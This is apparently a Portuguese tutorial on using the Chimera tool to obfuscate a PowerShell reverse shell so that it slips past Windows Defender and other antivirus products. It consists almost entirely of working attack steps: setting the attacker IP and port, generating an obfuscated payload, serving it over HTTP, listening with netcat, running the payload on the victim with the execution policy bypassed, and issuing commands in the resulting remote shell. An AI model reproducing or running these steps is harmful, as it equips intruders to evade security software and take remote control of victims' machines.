Chimera é uma ferramenta desenvolvida em Shell Script que gera payloads capaz de realizar o bypass no Windows Defender e em outros Antivírus conhecidos.
Realize o clone do projeto Chimera e liste o conteúdo do diretório.
Linuxgit clone https://github.com/tokyoneon/Chimera cd Chimera/ ls -l
Realize a alteração do IP e Porta atual do Atacante em todos os scripts do diretório shells :
sed -i 's/192.168.56.101/192.168.0.53/g' shells/*.ps1 sed -i 's/4444/8888/g' shells/*.ps1
Para gerar o payload.ps1 basta executar o comando :
Linux./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o payload.ps1 -v -t powershell,windows,copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,invoke-expression,out-string,write-error -j -g -k -r -p
👍 payload.ps1 gerado com sucesso!
Para realizar o download o payload.ps1 inicie o serviço web :
Linuxpython3 -m http.server 80
Na máquina da vítima acesse o IP do Atacante pelo navegador e salve o payload.ps1
Certifique-se que o AntiVírus esteja devidamente atualizado!
Execute o nc na porta 8888 para receber a conexão reversa :
Linuxnc -nvlp 8888
Execute o payload na máquina da Vítima.
PowerShellPowerShell.exe -ExecutionPolicy Bypass .\payload.ps1
Observe que a conexão reversa é estabelecida com sucesso!
LinuxPs > Ps > hostname Ps > whoami Ps > dir
Para confirmar se o Windows Defender está habilitado digite :.
PowerShellGet-MpComputerStatus | Select-Object -Property Antivirusenabled,AMServiceEnabled,AntispywareEnabled,BehaviorMonitorEnabled,IoavProtectionEnabled,NISEnabled,OnAccessProtectionEnabled,RealTimeProtectionEnabled,AntivirusSignatureLastUpdated